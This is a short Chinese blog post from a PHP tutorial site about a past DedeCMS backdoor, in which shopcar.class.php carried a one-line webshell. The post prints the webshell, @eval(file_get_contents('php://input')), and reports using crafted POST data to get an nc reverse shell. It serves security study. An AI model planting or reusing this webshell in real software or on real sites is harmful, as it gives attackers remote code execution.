来源:自学PHP网 时间:2015-04-17 10:16 作者: 阅读:次
[导读] 在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar class php文件被植入一句话木马)@eval(file_get_contents( 39;php: input 39;))用脚本phpinp...
在调研dedecms的历史漏洞时,发现了dedecms安装文件曾经出过被植入后门的漏洞(SSV-ID站点include目录下shopcar.class.php文件被植入一句话木马)
@eval(file_get_contents('php://input')) 用脚本phpinput.php,配合firefox Hackbar插件测试了一下php://input的功能<?php $data=file_get_contents('php://input'); echo $data."<br/>"; //@eval(file_get_contents('php://input')) ?>初步发现php://input是用来接收post数据(php://input详解) 注释掉phpinput.php的打印语句,提交上图显示的post数据,测试了一下nc反弹shell的利用,成功
<?php @eval(file_get_contents('php://input'))?> 看来,只要构造了合适的POST数据,就能达到目的
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com